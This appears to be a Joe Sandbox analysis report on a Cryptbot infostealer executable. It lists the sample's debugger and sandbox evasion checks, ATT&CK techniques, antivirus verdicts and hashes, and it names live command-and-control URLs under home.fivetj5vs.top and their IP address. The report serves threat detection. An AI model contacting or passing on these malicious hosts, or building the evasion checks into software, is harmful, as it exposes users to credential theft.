    Source: FYQ6Ee6gbS.exe, 00000001.00000002.1587827437.0000000000A00000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
    Source: FYQ6Ee6gbS.exe, 00000001.00000003.1553449105.000000000154F000.00000004.00000020.00020000.00000000.sdmp, FYQ6Ee6gbS.exe, 00000001.00000003.1553280122.00000000014F2000.00000004.00000020.00020000.00000000.sdmp, FYQ6Ee6gbS.exe, 00000001.00000003.1553420460.0000000001542000.00000004.00000020.00020000.00000000.sdmp, FYQ6Ee6gbS.exe, 00000001.00000003.1553597633.000000000155D000.00000004.00000020.00020000.00000000.sdmp, FYQ6Ee6gbS.exe, 00000001.00000002.1588659047.000000000155E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeSystem information queried: ModuleInformationJump to behavior
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeProcess information queried: ProcessInformationJump to behavior

    Anti Debugging

    barindex
    Hides threads from debuggers
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeThread information set: HideFromDebuggerJump to behavior
    Tries to detect sandboxes and other dynamic analysis tools (window names)
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeOpen window title or class name: regmonclass
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeOpen window title or class name: gbdyllo
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeOpen window title or class name: procmon_window_class
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeOpen window title or class name: ollydbg
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeOpen window title or class name: filemonclass
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeFile opened: NTICE
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeFile opened: SICE
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeFile opened: SIWVID
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_00409980 rdtsc 1_2_00409980
    Source: FYQ6Ee6gbS.exe, FYQ6Ee6gbS.exe, 00000001.00000002.1587827437.0000000000A00000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: *'@vProgram Manager
    Source: FYQ6Ee6gbS.exe, 00000001.00000002.1587827437.0000000000A00000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: o*'@vProgram Manager
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
    Source: FYQ6Ee6gbS.exe, 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmp, FYQ6Ee6gbS.exe, 00000001.00000003.1453047831.000000000710E000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: procmon.exe
    Source: FYQ6Ee6gbS.exe, 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmp, FYQ6Ee6gbS.exe, 00000001.00000003.1453047831.000000000710E000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: wireshark.exe

    Stealing of Sensitive Information

    barindex
    Yara detected Cryptbot
    Source: Yara matchFile source: Process Memory Space: FYQ6Ee6gbS.exe PID: 7508, type: MEMORYSTR
    Infostealer behavior detected
    Source: Signature ResultsSignatures: Mutex created, HTTP post and idle behavior
    Leaks process information
    Source: global trafficTCP traffic: 192.168.2.8:49706 -> 176.53.147.104:80

    Remote Access Functionality

    barindex
    Yara detected Cryptbot
    Source: Yara matchFile source: Process Memory Space: FYQ6Ee6gbS.exe PID: 7508, type: MEMORYSTR

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
    Command and Scripting Interpreter    		1
    DLL Side-Loading    		1
    Process Injection    		23
    Virtualization/Sandbox Evasion    		OS Credential Dumping751
    Security Software Discovery    		1
    Exploitation of Remote Services    		11
    Archive Collected Data    		11
    Encrypted Channel    		Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
    DLL Side-Loading    		1
    Process Injection    		LSASS Memory23
    Virtualization/Sandbox Evasion    		Remote Desktop Protocol1
    Data from Local System    		4
    Ingress Tool Transfer    		Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
    Deobfuscate/Decode Files or Information    		Security Account Manager13
    Process Discovery    		SMB/Windows Admin SharesData from Network Shared Drive4
    Non-Application Layer Protocol    		Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
    Obfuscated Files or Information    		NTDS1
    Remote System Discovery    		Distributed Component Object ModelInput Capture15
    Application Layer Protocol    		Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
    Software Packing    		LSA Secrets1
    File and Directory Discovery    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
    DLL Side-Loading    		Cached Domain Credentials216
    System Information Discovery    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    FYQ6Ee6gbS.exe50%VirustotalBrowse
    FYQ6Ee6gbS.exe71%ReversingLabsWin32.Infostealer.Tinba
    FYQ6Ee6gbS.exe100%AviraTR/Crypt.TPM.Gen
    FYQ6Ee6gbS.exe100%Joe Sandbox ML

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://home.fivetj5vs.top/enQdvpMCNJgKflSEBdde17361387674fd4100%Avira URL Cloudmalware
    http://home.fivetj5vs.top/enQdvpMCNJgKflSEBdde1736138767100%Avira URL Cloudmalware
    http://home.fivetj5vs.top/enQdvpMCNJgKflSEBdde17100%Avira URL Cloudmalware
    http://home.fivetj5vs.top/enQdvpMCNJgKflSEBdde1736138767?argument=0100%Avira URL Cloudmalware
    home.fivetj5vs.top100%Avira URL Cloudmalware
    gPhome.fivetj5vs.top100%Avira URL Cloudmalware
    http://home.fivetj5vs.top/enQdvpMCNJgKflSEBdde1736138767vvI100%Avira URL Cloudmalware
    http://home.fivetj5vs.top/enQdvpMCNJgKflSEBdde1736138767http://home.fivetj5vs.top/enQdvpMCNJgKflSEBd100%Avira URL Cloudmalware
    http://home.fivetj5vs.top/enQdvpMCNJgKflSEBdde17361387676963100%Avira URL Cloudmalware
    home.fivetj5vs.tops.top0%Avira URL Cloudsafe
    .1.1home.fivetj5vs.top100%Avira URL Cloudmalware
    a.dnspod.coms.top0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    home.fivetj5vs.top
    		176.53.147.104
    		truetrue
      		unknown
      httpbin.org
      		50.19.58.113
      		truefalse
        		high

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        home.fivetj5vs.tops.toptrue
        • Avira URL Cloud: safe
        		unknown
        http://home.fivetj5vs.top/enQdvpMCNJgKflSEBdde1736138767true
        • Avira URL Cloud: malware
        		unknown
        home.fivetj5vs.toptrue
        • Avira URL Cloud: malware
        		unknown
        http://home.fivetj5vs.top/enQdvpMCNJgKflSEBdde1736138767?argument=0true
        • Avira URL Cloud: malware
        		unknown
        gPhome.fivetj5vs.toptrue
        • Avira URL Cloud: malware
        		unknown
        https://httpbin.org/ipfalse
          		high
          a.dnspod.coms.toptrue
          • Avira URL Cloud: safe
          		unknown
          .1.1home.fivetj5vs.toptrue
          • Avira URL Cloud: malware
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://curl.se/docs/hsts.htmlFYQ6Ee6gbS.exe, 00000001.00000003.1453047831.000000000710E000.00000004.00001000.00020000.00000000.sdmpfalse
            		high
            http://html4/loose.dtdFYQ6Ee6gbS.exe, 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmp, FYQ6Ee6gbS.exe, 00000001.00000003.1453047831.000000000710E000.00000004.00001000.00020000.00000000.sdmpfalse
              		high
              https://curl.se/docs/alt-svc.html#FYQ6Ee6gbS.exefalse
                		high
                http://home.fivetj5vs.top/enQdvpMCNJgKflSEBdde17FYQ6Ee6gbS.exe, 00000001.00000003.1453047831.000000000710E000.00000004.00001000.00020000.00000000.sdmpfalse
                • Avira URL Cloud: malware
                		unknown
                https://httpbin.org/ipbeforeFYQ6Ee6gbS.exe, 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmp, FYQ6Ee6gbS.exe, 00000001.00000003.1453047831.000000000710E000.00000004.00001000.00020000.00000000.sdmpfalse
                  		high
                  https://curl.se/docs/http-cookies.htmlFYQ6Ee6gbS.exe, FYQ6Ee6gbS.exe, 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmp, FYQ6Ee6gbS.exe, 00000001.00000003.1453047831.000000000710E000.00000004.00001000.00020000.00000000.sdmpfalse
                    		high
                    http://home.fivetj5vs.top/enQdvpMCNJgKflSEBdde17361387674fd4FYQ6Ee6gbS.exe, 00000001.00000002.1588443862.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, FYQ6Ee6gbS.exe, 00000001.00000003.1554004988.00000000014E7000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    http://home.fivetj5vs.top/enQdvpMCNJgKflSEBdde17361387676963FYQ6Ee6gbS.exe, 00000001.00000002.1588443862.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, FYQ6Ee6gbS.exe, 00000001.00000003.1554004988.00000000014E7000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    https://curl.se/docs/hsts.html#FYQ6Ee6gbS.exefalse
                      		high
                      http://home.fivetj5vs.top/enQdvpMCNJgKflSEBdde1736138767http://home.fivetj5vs.top/enQdvpMCNJgKflSEBdFYQ6Ee6gbS.exe, 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmpfalse
                      • Avira URL Cloud: malware
                      		unknown
                      https://curl.se/docs/http-cookies.html#FYQ6Ee6gbS.exefalse
                        		high
                        https://curl.se/docs/alt-svc.htmlFYQ6Ee6gbS.exe, 00000001.00000003.1453047831.000000000710E000.00000004.00001000.00020000.00000000.sdmpfalse
                          		high
                          http://.cssFYQ6Ee6gbS.exe, 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmp, FYQ6Ee6gbS.exe, 00000001.00000003.1453047831.000000000710E000.00000004.00001000.00020000.00000000.sdmpfalse
                            		high
                            http://.jpgFYQ6Ee6gbS.exe, 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmp, FYQ6Ee6gbS.exe, 00000001.00000003.1453047831.000000000710E000.00000004.00001000.00020000.00000000.sdmpfalse
                              		high
                              http://home.fivetj5vs.top/enQdvpMCNJgKflSEBdde1736138767vvIFYQ6Ee6gbS.exe, 00000001.00000002.1588443862.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, FYQ6Ee6gbS.exe, 00000001.00000003.1554004988.00000000014E7000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: malware
                              		unknown

                              World Map of Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public IPs

                              IPDomainCountryFlagASNASN NameMalicious
                              176.53.147.104
                              		home.fivetj5vs.topUnited Kingdom
                              		35791VANNINVENTURESGBtrue
                              50.19.58.113
                              		httpbin.orgUnited States
                              		14618AMAZON-AESUSfalse

                              General Information

                              Joe Sandbox version:42.0.0 Malachite
                              Analysis ID:1588874
                              Start date and time:2025-01-11 06:35:23 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 4m 34s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:5
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:FYQ6Ee6gbS.exe
                              renamed because original name is a hash value
                              Original Sample Name:1149dc52a38ac45de7ba2d62192c2918.exe
                              Detection:MAL
                              Classification:mal100.troj.spyw.evad.winEXE@1/0@8/2
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:Failed
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Stop behavior analysis, all processes terminated

                              Warnings

                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                              • Excluded IPs from analysis (whitelisted): 52.149.20.212
                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                              • Not all processes where analyzed, report is missing behavior information
                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                              Simulations

                              Behavior and APIs

                              No simulations

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              50.19.58.113Set-up.exeGet hashmaliciousCryptbotBrowse
                                Set-up.exeGet hashmaliciousCryptbotBrowse
                                  Set-up.exeGet hashmaliciousCryptbotBrowse

                                    Domains

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    httpbin.orgSet-up.exeGet hashmaliciousCryptbotBrowse
                                    • 50.19.58.113
                                    Set-up.exeGet hashmaliciousCryptbotBrowse
                                    • 50.19.58.113
                                    Set-up.exeGet hashmaliciousCryptbotBrowse
                                    • 50.19.58.113
                                    ebjtOH70jl.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                    • 34.197.122.172
                                    random(3).exeGet hashmaliciousCryptbotBrowse
                                    • 34.200.57.114
                                    random(5).exeGet hashmaliciousCryptbotBrowse
                                    • 34.200.57.114
                                    Set-up.exeGet hashmaliciousUnknownBrowse
                                    • 34.200.57.114
                                    Set-up.exeGet hashmaliciousUnknownBrowse
                                    • 34.200.57.114
                                    TX5LAYBZRI.exeGet hashmaliciousUnknownBrowse
                                    • 34.200.57.114
                                    Prs9eAnu2k.exeGet hashmaliciousUnknownBrowse
                                    • 34.197.122.172

                                    ASNs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    AMAZON-AESUShttps://freesourcecodes70738.emlnk.com/lt.php?x=3DZy~GDLVnab5KCs-Nu4WOae1qEoiN9xvxk1XaPMVXahD5B9-Uy.xuW-242imNXGet hashmaliciousUnknownBrowse
                                    • 54.225.69.136
                                    3.elfGet hashmaliciousUnknownBrowse
                                    • 54.0.80.233
                                    http://www.jadavisinjurylawyers.com/Get hashmaliciousUnknownBrowse
                                    • 52.5.148.85
                                    https://noiclethomas.wixsite.com/riceGet hashmaliciousUnknownBrowse
                                    • 54.196.108.80
                                    phish_alert_sp2_2.0.0.0(4).emlGet hashmaliciousUnknownBrowse
                                    • 52.70.64.64
                                    https://app.online.mt.com/e/es?s=961579678&e=14507707&elqTrackId=4f40dcb3a3854013ad3a46d461cc3aff&elq=5140e028df1a42afab491350388fd129&elqaid=221811&elqat=1&elqcst=272&elqcsid=2325629&elqak=8AF5D97DFF9E423CC7C7524F5CA3C1A86F5F67341B9DF612D5A2FB20DE928F2AA351Get hashmaliciousUnknownBrowse
                                    • 52.70.64.64
                                    https://app.online.mt.com/e/es?s=961579678&e=14507707&elqTrackId=4f40dcb3a3854013ad3a46d461cc3aff&elq=5140e028df1a42afab491350388fd129&elqaid=221811&elqat=1&elqcst=272&elqcsid=2325629&elqak=8AF5D97DFF9E423CC7C7524F5CA3C1A86F5F67341B9DF612D5A2FB20DE928F2AA351Get hashmaliciousUnknownBrowse
                                    • 23.23.209.126
                                    https://maya-lopez.filemail.com/t/XhcWEjoRGet hashmaliciousUnknownBrowse
                                    • 52.3.58.56
                                    https://www.shinsengumiusa.com/mrloskieGet hashmaliciousUnknownBrowse
                                    • 3.233.158.26
                                    SABXJ1B5c8.exeGet hashmaliciousMassLogger RATBrowse
                                    • 44.221.84.105
                                    VANNINVENTURESGBrandom(4).exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                    • 176.53.146.223
                                    random(3).exeGet hashmaliciousCryptbotBrowse
                                    • 176.53.146.223
                                    Prs9eAnu2k.exeGet hashmaliciousUnknownBrowse
                                    • 176.53.146.223
                                    joE9s9sbv0.exeGet hashmaliciousUnknownBrowse
                                    • 176.53.146.223
                                    JbN2WYseAr.exeGet hashmaliciousUnknownBrowse
                                    • 176.53.146.223
                                    ivHDHq51Ar.exeGet hashmaliciousUnknownBrowse
                                    • 176.53.146.223
                                    file.exeGet hashmaliciousScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, VidarBrowse
                                    • 176.53.146.212
                                    Tii6ue74NB.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, Stealc, VidarBrowse
                                    • 176.53.146.212
                                    file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYSBrowse
                                    • 176.53.146.212
                                    s3hvuz3XS0.exeGet hashmaliciousCryptbotBrowse
                                    • 176.53.146.212

                                    JA3 Fingerprints

                                    No context

                                    Dropped Files

                                    No context

                                    Created / dropped Files

                                    No created / dropped files found

                                    Static File Info

                                    General

                                    File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                    Entropy (8bit):7.982731095598978
                                    TrID:
                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                    • DOS Executable Generic (2002/1) 0.02%
                                    • VXD Driver (31/22) 0.00%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:FYQ6Ee6gbS.exe
                                    File size:4'487'168 bytes
                                    MD5:1149dc52a38ac45de7ba2d62192c2918
                                    SHA1:cb07a903a94b3d04813ae3ce1b24d48ddfb970ed
                                    SHA256:0b7e5470a3e798aeb45bf3e5abfa0873031828744b92ecca69ea3594db368237
                                    SHA512:2b772cd00d5cbc87cae39416c960f792740d82f9871e8d860841f3b49ecbb2aa9ba8f4d9dd6f1355a21387a5e25eeac18eae9ed4448c657c58533d9bce0ce299
                                    SSDEEP:98304:qaEbHfDFIUF0EqFRAFLlMY1bOjU0FH2SlbzF45ltBO47/WBK:qaEfFIUF0pgMYr82QF4ft0w/Ww
                                    TLSH:672633A916FB7478E02A8C74E8E72072C7B0F396589D4C104AE9567F46E3546372FD83
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....a{g...............(..J...h..2...@........J...@..........................p.......AE...@... ............................

                                    File Icon

                                    Icon Hash:00928e8e8686b000

                                    Static PE Info

                                    General

                                    Entrypoint:0xfb4000
                                    Entrypoint Section:.taggant
                                    Digitally signed:true
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                                    DLL Characteristics:DYNAMIC_BASE
                                    Time Stamp:0x677B61DD [Mon Jan 6 04:53:49 2025 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:4
                                    OS Version Minor:0
                                    File Version Major:4
                                    File Version Minor:0
                                    Subsystem Version Major:4
                                    Subsystem Version Minor:0
                                    Import Hash:2eabe9054cad5152567f0699947a2c5b

                                    Authenticode Signature

                                    Signature Valid:
                                    Signature Issuer:
                                    Signature Validation Error:
                                    Error Number:
                                    Not Before, Not After
                                      Subject Chain
                                        Version:
                                        Thumbprint MD5:
                                        Thumbprint SHA-1:
                                        Thumbprint SHA-256:
                                        Serial:

                                        Entrypoint Preview

                                        Instruction
                                        jmp 00007FB418F2EDEAh
                                        orps xmm0, dqword ptr [eax+eax+00h]
                                        add byte ptr [eax], al
                                        add cl, ch
                                        add byte ptr [eax], ah
                                        add byte ptr [eax], al
                                        add byte ptr [ebx], al
                                        or al, byte ptr [eax]
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], dl
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [edx+ecx], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add dword ptr [eax+00000000h], eax
                                        add byte ptr [eax], al
                                        adc byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add eax, 0000000Ah
                                        add byte ptr [eax], al
                                        add byte ptr [eax], dl
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [edx], al
                                        or al, byte ptr [eax]
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [ecx+00000080h], dh
                                        add byte ptr [eax], al
                                        add byte ptr [eax], dh
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax+eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        and al, 00h
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add dword ptr [eax+00000000h], eax
                                        add byte ptr [eax], al
                                        adc byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add eax, 0000000Ah
                                        add byte ptr [eax], al
                                        add byte ptr [eax], dl
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [ecx], al
                                        or al, byte ptr [eax]
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [ecx], al
                                        add byte ptr [eax], 00000000h
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al

                                        Data Directories

                                        NameVirtual AddressVirtual Size Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x66005f0x73.idata
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x65f0000x1ac.rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x68b8000x688
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xbb214c0x10bqmneslf
                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_TLS0xbb20fc0x18bqmneslf
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                        Sections

                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                        0x10000x65e0000x288800c94cea1bf64705266672d2833b82f620unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .rsrc0x65f0000x1ac0x200e3fab847ed0cf782cbfb8086e8ed1b3aFalse0.583984375data4.5230571413271505IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .idata 0x6600000x10000x200bae83aff379a7254c53c159eb2418240False0.166015625data1.0989825165499407IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        0x6610000x3960000x20074d1bc028f824b05e6db6f30a1a870e8unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        bqmneslf0x9f70000x1bc0000x1bb400fe580fc2210af5603c29b7611288d07dFalse0.9946908708756346data7.9570043649451305IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        xbtqkxjw0xbb30000x10000x400cbcefa76695f29d87f3666579c6a36c5False0.8076171875data6.302415550636275IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .taggant0xbb40000x30000x22001aceead7c64c09b95c8ff22a92b7e1d8False0.09340533088235294DOS executable (COM)1.1341875546841558IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                        Resources

                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                        RT_MANIFEST0xbb215c0x152ASCII text, with CRLF line terminators0.6479289940828402

                                        Imports

                                        DLLImport
                                        kernel32.dlllstrcpy

                                        Network Behavior

                                        Suricata IDS Alerts

                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                        2025-01-11T06:36:26.951949+01002059018ET MALWARE CryptBot CnC Checkin1192.168.2.849706176.53.147.10480TCP

                                        Network Port Distribution

                                        TCP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Jan 11, 2025 06:36:24.221633911 CET49705443192.168.2.850.19.58.113
                                        Jan 11, 2025 06:36:24.221748114 CET4434970550.19.58.113192.168.2.8
                                        Jan 11, 2025 06:36:24.221892118 CET49705443192.168.2.850.19.58.113
                                        Jan 11, 2025 06:36:24.252253056 CET49705443192.168.2.850.19.58.113
                                        Jan 11, 2025 06:36:24.252300024 CET4434970550.19.58.113192.168.2.8
